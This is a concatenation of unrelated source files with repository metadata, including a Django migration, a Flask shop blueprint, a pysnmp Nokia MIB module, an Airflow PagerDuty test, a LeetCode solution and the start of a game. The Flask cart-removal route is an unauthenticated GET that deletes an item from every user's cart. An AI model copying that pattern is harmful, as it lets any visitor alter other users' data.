field=models.CharField(default='default', max_length=60),
preserve_default=False,
),
migrations.AddField(
model_name='product',
name='country',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='product.Country'),
preserve_default=False,
),
migrations.AddField(
model_name='product',
name='manifacturere',
field=models.CharField(default='default', max_length=60),
preserve_default=False,
),
migrations.AddField(
model_name='product',
name='photo',
field=vendor.items.fields.ThumbnailImageField(blank=True, null=True, storage=vendor.items.fields.MyFileSystemStorage(), upload_to='products_photo/'),
),
migrations.AddField(
model_name='product',
name='retail_unit_price',
field=models.FloatField(default=0.0),
),
migrations.AddField(
model_name='product',
name='size_weight',
field=models.CharField(default='default', max_length=60),
preserve_default=False,
),
migrations.AddField(
model_name='product',
name='zero_gst',
field=models.BooleanField(default=True),
),
migrations.AlterField(
model_name='product',
name='description',
field=models.TextField(blank=True, null=True, verbose_name='Description (optional)'),
),
migrations.AlterField(
model_name='product',
name='name',
field=models.CharField(max_length=60, verbose_name='Name of the Product'),
),
migrations.AddField(
model_name='product',
name='packing',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='product.Packing'),
preserve_default=False,
),
migrations.AddField(
model_name='product',
name='type_or_user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='product.TypeOrUser'),
preserve_default=False,
),
]
|
[
"a.kukhtichev@mail.ru"
] |
a.kukhtichev@mail.ru
|
57809b70323bdda9468df6f71f4fb499da34d2fc
|
655396f38912107eb94cef5a20e2f5073ba9b380
|
/app/blueprints/shop/routes.py
|
54b75999ee221d0b2fc8941d0a1e8de8ce039add
|
[] |
no_license
|
btnewman7/PizzaBook
|
5b10656774ddf6740ec2dbf4cb460e79ae779958
|
0d5036666884d1d3ab5dab28030c79cd397a3979
|
refs/heads/master
| 2023-02-04T22:01:17.623014
| 2020-12-28T20:35:21
| 2020-12-28T20:35:21
| 325,065,118
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,287
|
py
|
from app import db
from . import bp as shop
from flask import render_template, redirect, url_for, request, flash, session, jsonify, current_app as app
from .models import Product, Category, Cart
from app.blueprints.authentication.models import User
from flask_login import login_required, current_user
from datetime import datetime as dt
@shop.route('/', methods=['GET'])
@login_required
def index():
context = {
'products': Product.query.all()
}
return render_template('shop/index.html', **context)
@shop.route('/product', methods=['GET'])
def single():
product_id = request.args.get('id')
context = {
'p': Product.query.get(product_id)
}
return render_template('shop/single.html', **context)
@shop.route('/category', methods=['GET'])
def category():
category_id = request.args.get('id')
print(request.args)
context = {
'category': Category.query.get(category_id),
'products': Product.query.filter_by(category_id=category_id).all()
}
return render_template('shop/index.html', **context)
@shop.route('/cart', methods=['GET'])
def show_cart():
if current_user.is_anonymous:
context = {
'products': []
}
else:
context = {
'products': [Product.query.get(i.product_id) for i in Cart.query.filter_by(user_id=current_user.id).all()]
}
return render_template('shop/cart.html', **context)
@shop.route('/cart/remove', methods=['GET'])
def delete_from_cart():
product_id = request.args.get('id')
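    # NOTE: the query below removes the product from every user's cart (it filters on product_id only, not user_id)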
    for item in Cart.query.filter_by(product_id=product_id).all():
        db.session.delete(item)
db.session.commit()
flash(f'{Product.query.get(product_id).name} removed successfully.', 'warning')
return redirect(url_for('shop.show_cart'))
@shop.route('/cart/add', methods=['GET'])
def add_to_cart():
user = User.query.get(current_user.id)
if not user.is_customer:
user.is_customer = True
db.session.commit()
product_id = request.args.get('product_id')
data = {
'user_id': user.id,
'product_id': product_id,
}
cart = Cart()
cart.from_dict(data)
cart.save()
flash(f'{Product.query.get(product_id).name} added successfully', 'success')
return redirect(request.referrer)
|
[
"btnewman7@gmail.com"
] |
btnewman7@gmail.com
|
97179fb73975045ce078f06639e479f9e51d03b7
|
67a4d71c2f46069ee1c9da574fe13e503db4b67d
|
/pych-eight/8_6to8_8.py
|
f0637e14fef50e186e12dc07428c48cefab82c13
|
[] |
no_license
|
2648226350/Python_learn
|
3804c545755e17ecdc45d671d2f5b0899a59b034
|
87c362120124fcd23d14c0bdd4c72e7b8e2d48ba
|
refs/heads/master
| 2023-07-11T22:00:12.683588
| 2021-08-16T13:58:19
| 2021-08-16T13:58:19
| 396,794,228
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 656
|
py
|
#8-6
def city_country(name, country):
print("'"+name.title()+", "+country.title()+"'")
city_country('Santiago', 'Chile')
city_country('Peking', 'China')
city_country('London', 'England')
#8-7
def make_album(singer, album, number = 0):
if number != 0:
return {singer:album,'number':number}
else:
return {singer:album}
print(make_album('Jach','Aaaa',3))
print(make_album('mj','Bbb'))
#8-8
singer = input("Please input the singer. ")
album = input("Please input the album. ")
while singer != 'quit':
print(make_album(singer, album))
singer = input("Please input the singer. ")
album = input("Please input the album. ")
|
[
"2648226350@qq.com"
] |
2648226350@qq.com
|
04b8ed50c24c320d25836ef6911aab27ca4dc7b7
|
85a9ffeccb64f6159adbd164ff98edf4ac315e33
|
/pysnmp-with-texts/NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP.py
|
da7cb8b996dbd193802a4c80260e2d37c3f3b78e
|
[
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
agustinhenze/mibs.snmplabs.com
|
5d7d5d4da84424c5f5a1ed2752f5043ae00019fb
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
refs/heads/master
| 2020-12-26T12:41:41.132395
| 2019-08-16T15:51:41
| 2019-08-16T15:53:57
| 237,512,469
| 0
| 0
|
Apache-2.0
| 2020-01-31T20:41:36
| 2020-01-31T20:41:35
| null |
UTF-8
|
Python
| false
| false
| 17,953
|
py
|
#
# PySNMP MIB module NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP
# Produced by pysmi-0.3.4 at Wed May 1 14:23:28 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "SingleValueConstraint")
NoiAdditionalText, NoiEventTime, NoiAlarmTableCount = mibBuilder.importSymbols("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-COMMON-DEFINITION", "NoiAdditionalText", "NoiEventTime", "NoiAlarmTableCount")
NoiMeasurementJobStatus, NoiMeasurementResultTransfer, NoiMeasurementResultIdentifier, NoiMeasurementFileTransfer, NoiMeasurementFileName, NoiMeasurementActivationError, NoiMeasurementFileDirectory = mibBuilder.importSymbols("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-COMMON-DEFINITION", "NoiMeasurementJobStatus", "NoiMeasurementResultTransfer", "NoiMeasurementResultIdentifier", "NoiMeasurementFileTransfer", "NoiMeasurementFileName", "NoiMeasurementActivationError", "NoiMeasurementFileDirectory")
noiPmTable, noiPmCompliance, noiPmVariable, noiOpenInterfaceModule, noiPmNotification = mibBuilder.importSymbols("NOKIA-NE3S-REGISTRATION-MIB", "noiPmTable", "noiPmCompliance", "noiPmVariable", "noiOpenInterfaceModule", "noiPmNotification")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
Gauge32, ModuleIdentity, NotificationType, Bits, Unsigned32, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, IpAddress, iso, ObjectIdentity, Counter32, Counter64, TimeTicks, Integer32 = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "ModuleIdentity", "NotificationType", "Bits", "Unsigned32", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "IpAddress", "iso", "ObjectIdentity", "Counter32", "Counter64", "TimeTicks", "Integer32")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
noiSnmpPmIrp = ModuleIdentity((1, 3, 6, 1, 4, 1, 94, 7, 1, 1, 4))
noiSnmpPmIrp.setRevisions(('1970-01-01 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: noiSnmpPmIrp.setRevisionsDescriptions(('Version 1.0.6',))
if mibBuilder.loadTexts: noiSnmpPmIrp.setLastUpdated('200227020000Z')
if mibBuilder.loadTexts: noiSnmpPmIrp.setOrganization('Nokia Networks')
if mibBuilder.loadTexts: noiSnmpPmIrp.setContactInfo('e-mail: NET-OSS-OPEN-SNMP DL (Microsoft Outlook, Nokia internal) DL.NET-OSS-OPEN-SNMP-DL@nokia.com')
if mibBuilder.loadTexts: noiSnmpPmIrp.setDescription('This SNMP MIB-module specifies the SNMP Solution Set of the PM Integration Reference Point (IRP), also known as Enhanced SNMP Solution Suite. The purpose of this IRP is to define an interface through which a network element manager (or a network element) can communicate PM information for its managed objects to Nokia OS, NetAct.')
noiPmIrpVersion = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(5, 5)).setFixedLength(5)).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmIrpVersion.setStatus('current')
if mibBuilder.loadTexts: noiPmIrpVersion.setDescription("This object represents the version of the PM IRP supported by the agent. The format is 'n.m.o', where 'n' is the main version number of the interface model and 'm' and 'o' are the release numbers within the main version. This version is 1.0.6.")
noiPmFileTransferProtocol = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 2), NoiMeasurementFileTransfer()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiPmFileTransferProtocol.setStatus('current')
if mibBuilder.loadTexts: noiPmFileTransferProtocol.setDescription('Contains the supported file transfer mechanism for various files within NE3S. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiPmResultTransfer = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 3), NoiMeasurementResultTransfer()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiPmResultTransfer.setStatus('current')
if mibBuilder.loadTexts: noiPmResultTransfer.setDescription('Contains the supported transfer mechanism for measurement result, e.g. notification based or polling based. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementScheduleFileDirectory = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 4), NoiMeasurementFileDirectory()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementScheduleFileDirectory.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementScheduleFileDirectory.setDescription('Contains the directory where the measurement schedule file is stored within the agent. The manager polls the value before downloading the measurement file. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementRepositoryDirectory = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 5), NoiMeasurementFileDirectory()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementRepositoryDirectory.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementRepositoryDirectory.setDescription('Contains the directory where the measurement repository file is stored within the agent. The manager polls the value before retrieving the repository file. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementRepositoryFile = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 6), NoiMeasurementFileName()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementRepositoryFile.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementRepositoryFile.setDescription('Contains the file name of the repository file. The manager polls the value before retrieving the repository file. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementJobStatus = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 7), NoiMeasurementJobStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementJobStatus.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementJobStatus.setDescription('This object represents the measurement job status. The agent will update the value according to the state model defined in the interface specification.')
noiMeasurementActivationError = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 8), NoiMeasurementActivationError()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementActivationError.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementActivationError.setDescription('Contains the error code in case of failure in measurement administration.')
noiPmAdditionalText = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 9), NoiAdditionalText()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmAdditionalText.setStatus('current')
if mibBuilder.loadTexts: noiPmAdditionalText.setDescription('Contains additional text and is used in conjunction with the notification noiMeasurementResultTableRebuild and in case of failure in measurement administration.')
noiPmFileStoringPeriod = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 10), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiPmFileStoringPeriod.setStatus('current')
if mibBuilder.loadTexts: noiPmFileStoringPeriod.setDescription('Contains the storage duration for the measurement file in the agent. Duration in minutes. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementResultTableCount = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 1), NoiAlarmTableCount()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementResultTableCount.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTableCount.setDescription('Contains the number of currently active entries in the measurement table. When the table is empty, the value of this object is zero (0).')
noiMeasurementResultTableMaxCount = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 2), NoiAlarmTableCount()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementResultTableMaxCount.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTableMaxCount.setDescription('Contains the maximum number of entries in the measurement table.')
noiPmLastMeasurementResultId = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 3), NoiMeasurementResultIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmLastMeasurementResultId.setStatus('current')
if mibBuilder.loadTexts: noiPmLastMeasurementResultId.setDescription('This object represents the measurement identifier of the last sent noiMeasurementResultReady notification. The manager can retrieve the current value of this object to detect lost notifications. This mechanism can be used by the manager when no notification has been received for a certain time (e.g. 30 minutes) to evaluate whether a retrieval of entries from the measurement table shall be performed.')
noiMeasurementResultTable = MibTable((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4), )
if mibBuilder.loadTexts: noiMeasurementResultTable.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTable.setDescription('Table containing information about the measurement files that are currently stored in the Network Element and accessible for the manager. The agent will create a new entry whenever a new measurement file has been created. When removing a measurement file, the corresponding entry in the table must be removed.')
noiMeasurementResultEntry = MibTableRow((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1), ).setIndexNames((0, "NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultIdentifier"))
if mibBuilder.loadTexts: noiMeasurementResultEntry.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultEntry.setDescription('One entry in the measurement table, containing the information of one measurement file.')
noiMeasurementResultIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 1), NoiMeasurementResultIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementResultIdentifier.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultIdentifier.setDescription('This object represents the measurement identifier of an entry in the measurement table. It uniquely identifies an entry in the table.')
noiMeasurementFileName = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 2), NoiMeasurementFileName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementFileName.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementFileName.setDescription('This object represents the file name of a measurement result file.')
noiMeasurementFileDirectory = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 3), NoiMeasurementFileDirectory()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementFileDirectory.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementFileDirectory.setDescription('This object represents the full path of a measurement result file.')
noiPmEventTime = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 4, 1, 4), NoiEventTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmEventTime.setStatus('current')
if mibBuilder.loadTexts: noiPmEventTime.setDescription('This object represents the time the event occurred.')
noiMeasurementResultReady = NotificationType((1, 3, 6, 1, 4, 1, 94, 7, 3, 3, 0, 1)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultIdentifier"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileDirectory"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileName"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmEventTime"))
if mibBuilder.loadTexts: noiMeasurementResultReady.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultReady.setDescription('This notification is used when a new measurement data file has been created and a new entry in the measurement table has been inserted.')
noiMeasurementResultTableRebuild = NotificationType((1, 3, 6, 1, 4, 1, 94, 7, 3, 3, 0, 2)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmAdditionalText"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmEventTime"))
if mibBuilder.loadTexts: noiMeasurementResultTableRebuild.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTableRebuild.setDescription('This notification is used when the measurement table in the agent has been rebuilt. The notification will be emitted after the measurement table has been dropped and all previously stored entries have been removed.')
noiPmIRPCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 94, 7, 3, 6, 1)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmMandatoryGroup"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmNotificationOptionalGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
noiPmIRPCompliance = noiPmIRPCompliance.setStatus('current')
if mibBuilder.loadTexts: noiPmIRPCompliance.setDescription('This specifies the objects that are required to claim compliance to NE3S PM Fragment.')
noiPmMandatoryGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 94, 7, 3, 6, 2)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmIrpVersion"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmLastMeasurementResultId"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementScheduleFileDirectory"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultTableCount"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultTableMaxCount"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultIdentifier"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileDirectory"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementFileName"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmEventTime"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiPmFileStoringPeriod"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
noiPmMandatoryGroup = noiPmMandatoryGroup.setStatus('current')
if mibBuilder.loadTexts: noiPmMandatoryGroup.setDescription('A collection of objects that represents mandatory PM attributes.')
noiPmNotificationOptionalGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 94, 7, 3, 6, 3)).setObjects(("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultReady"), ("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", "noiMeasurementResultTableRebuild"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
noiPmNotificationOptionalGroup = noiPmNotificationOptionalGroup.setStatus('current')
if mibBuilder.loadTexts: noiPmNotificationOptionalGroup.setDescription('A collection of optional measurement notifications.')
mibBuilder.exportSymbols("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP", noiPmMandatoryGroup=noiPmMandatoryGroup, noiMeasurementResultIdentifier=noiMeasurementResultIdentifier, noiSnmpPmIrp=noiSnmpPmIrp, noiMeasurementFileDirectory=noiMeasurementFileDirectory, noiMeasurementResultTableCount=noiMeasurementResultTableCount, noiPmIrpVersion=noiPmIrpVersion, noiPmNotificationOptionalGroup=noiPmNotificationOptionalGroup, noiMeasurementJobStatus=noiMeasurementJobStatus, noiMeasurementFileName=noiMeasurementFileName, noiMeasurementResultTableRebuild=noiMeasurementResultTableRebuild, noiPmEventTime=noiPmEventTime, noiPmLastMeasurementResultId=noiPmLastMeasurementResultId, noiMeasurementResultEntry=noiMeasurementResultEntry, noiPmResultTransfer=noiPmResultTransfer, noiPmFileStoringPeriod=noiPmFileStoringPeriod, noiMeasurementActivationError=noiMeasurementActivationError, noiPmAdditionalText=noiPmAdditionalText, noiMeasurementResultTable=noiMeasurementResultTable, noiMeasurementScheduleFileDirectory=noiMeasurementScheduleFileDirectory, noiMeasurementRepositoryDirectory=noiMeasurementRepositoryDirectory, noiMeasurementResultReady=noiMeasurementResultReady, noiMeasurementRepositoryFile=noiMeasurementRepositoryFile, noiMeasurementResultTableMaxCount=noiMeasurementResultTableMaxCount, noiPmIRPCompliance=noiPmIRPCompliance, noiPmFileTransferProtocol=noiPmFileTransferProtocol, PYSNMP_MODULE_ID=noiSnmpPmIrp)
|
[
"dcwangmit01@gmail.com"
] |
dcwangmit01@gmail.com
|
14e91d5ff3559bb2e7cbecab0ad3db1f1db77c3b
|
323317f286577a719f2bdaecd9f1afa820c0b9a5
|
/1588 - Sum of All Odd Length Subarrays.py
|
abbb31ae6381b2dbf42b691a6dbe8f7b74680598
|
[] |
no_license
|
AlexisDongMariano/leetcode
|
e896a69e58c438c3e9a0c7319fc69e2e4182fc9e
|
db9d529d935bc5e730c194b2c8bf9008bc65d8ca
|
refs/heads/main
| 2023-04-09T10:17:27.036420
| 2021-04-26T06:03:31
| 2021-04-26T06:03:31
| 329,826,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,229
|
py
|
# ==============================
# Information
# ==============================
# Title: 1588 - Sum of All Odd Length Subarrays
# Link: https://leetcode.com/problems/sum-of-all-odd-length-subarrays/
# Difficulty: Easy
# Language: Python
# Problem:
# Given an array of positive integers arr, calculate the sum of all possible odd-length subarrays.
# A subarray is a contiguous subsequence of the array.
# Return the sum of all odd-length subarrays of arr.
# Example
# Input: arr = [1,4,2,5,3]
# Output: 58
# Explanation: The odd-length subarrays of arr and their sums are:
# [1] = 1
# [4] = 4
# [2] = 2
# [5] = 5
# [3] = 3
# [1,4,2] = 7
# [4,2,5] = 11
# [2,5,3] = 10
# [1,4,2,5,3] = 15
# If we add all these together we get 1 + 4 + 2 + 5 + 3 + 7 + 11 + 10 + 15 = 58
# ==============================
# Solution
# ==============================
def sum_length_all_subarrays(arr):
subarray_sum = 0
length = len(arr)
i = 0
while i <= length-1:
for j in range(0, length - i):
subarray_sum += sum(arr[j:(j + i) + 1])
i += 2
return subarray_sum
arr = [1,4,2,5,3]
print(sum_length_all_subarrays(arr))
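# ==============================
# Alternative (editor's sketch)
# ==============================
# Not from the original file: an O(n) counting approach. Each arr[i] can start
# a subarray at left = i + 1 positions and end one at right = n - i positions,
# so it appears in left * right subarrays, (left * right + 1) // 2 of which
# have odd length.
def sum_odd_length_subarrays_linear(arr):
    total = 0
    n = len(arr)
    for i, value in enumerate(arr):
        left, right = i + 1, n - i
        total += ((left * right + 1) // 2) * value
    return total
print(sum_odd_length_subarrays_linear([1, 4, 2, 5, 3]))  # 58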
|
[
"alexisdongmariano@gmail.com"
] |
alexisdongmariano@gmail.com
|
767c2bfac9638826491205fbf82df7b3dfcd3672
|
6169a0af24553278c9493c9ac14d2351e9085afd
|
/tests/providers/pagerduty/hooks/test_pagerduty_events.py
|
3c68ba8247954e373fa2502a56287ba653a750a3
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
Nextdoor/airflow
|
c994f8fbaf48bebd891300f44dd78a58fd0b057b
|
863ec46e25ea49d6d5b006d8fd3a83f50aa9db79
|
refs/heads/master
| 2023-06-12T19:25:58.052324
| 2023-01-20T17:43:14
| 2023-01-20T17:43:14
| 54,076,271
| 7
| 8
|
Apache-2.0
| 2023-06-05T20:38:53
| 2016-03-17T00:34:45
|
Python
|
UTF-8
|
Python
| false
| false
| 2,285
|
py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import pytest
from airflow.models import Connection
from airflow.providers.pagerduty.hooks.pagerduty import PagerdutyEventsHook
from airflow.utils import db
DEFAULT_CONN_ID = "pagerduty_events_default"
@pytest.fixture(scope="class")
def events_connections():
db.merge_conn(Connection(conn_id=DEFAULT_CONN_ID, conn_type="pagerduty_events", password="events_token"))
class TestPagerdutyEventsHook:
def test_get_integration_key_from_password(self, events_connections):
hook = PagerdutyEventsHook(pagerduty_events_conn_id=DEFAULT_CONN_ID)
assert hook.integration_key == "events_token", "token initialised."
def test_token_parameter_override(self, events_connections):
hook = PagerdutyEventsHook(integration_key="override_key", pagerduty_events_conn_id=DEFAULT_CONN_ID)
assert hook.integration_key == "override_key", "token initialised."
def test_create_event(self, requests_mock, events_connections):
hook = PagerdutyEventsHook(pagerduty_events_conn_id=DEFAULT_CONN_ID)
mock_response_body = {
"status": "success",
"message": "Event processed",
"dedup_key": "samplekeyhere",
}
requests_mock.post("https://events.pagerduty.com/v2/enqueue", json=mock_response_body)
resp = hook.create_event(
summary="test",
source="airflow_test",
severity="error",
)
assert resp == mock_response_body
|
[
"noreply@github.com"
] |
noreply@github.com
|
854a55f2e40b628ef1f15c8ccb0cc9d75eb0bcfd
|
a9d8a58ed7a950fee3ee6514f33da7fd47c54906
|
/Dev1.py
|
4969e1ee84cdd06ebfc168ce8e1d494d2845a1b4
|
[] |
no_license
|
sms632/PrincessRescue
|
68cf5c696457735f08af6bd525b0ec89f0df1356
|
e143a54b03fb130ee14461381fcbc8c0df7edc4b
|
refs/heads/master
| 2016-09-05T16:49:26.556629
| 2014-02-18T03:50:36
| 2014-02-18T03:50:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,034
|
py
|
from livewires import games
import random
games.init(screen_width = 850, screen_height = 850, fps = 50)
class Grid(games.Sprite):
image = games.load_image("graphics/emptyGrid.png")
name = "Empty"
def __init__(self, x, y):
super(Grid, self).__init__(image = Grid.image,
x = x, y = y)
self.name = Grid.name
def die(self):
self.destroy()
class Ocean(games.Sprite):
image = games.load_image("graphics/emptyOcean.png")
canMove = True
name = "Ocean"
def __init__(self, x, y):
super(Ocean, self).__init__(image = Ocean.image,
x = x,
y = y)
self.name = Ocean.name
class Land(games.Sprite):
image = games.load_image("graphics/emptyLand.png")
canMove = False
name = "Land"
def __init__(self, x, y):
super(Land, self).__init__(image = Land.image,
x = x,
y = y)
self.name = Land.name
class Ship(games.Sprite):
""" A player controlled ship"""
canMove = True
def die(self):
self.destroy()
class Cruiser(Ship):
def die(self):
self.destroy()
class Carrier(Ship):
def die(self):
self.destroy()
class Destroyer(Ship):
image = games.load_image("graphics/ships/Leia/Destroyer.png")
name = "Destroyer"
def __init__(self, x, y):
super(Destroyer, self).__init__(image = Destroyer.image,
x = x,
y = y)
self.name = Destroyer.name
def die(self):
self.destroy()
class Selector(games.Sprite):
image = games.load_image("graphics/selector.png")
inputDelay = 10
def __init__(self, Grid):
super(Selector, self).__init__(image = Selector.image,
x = Grid.x,
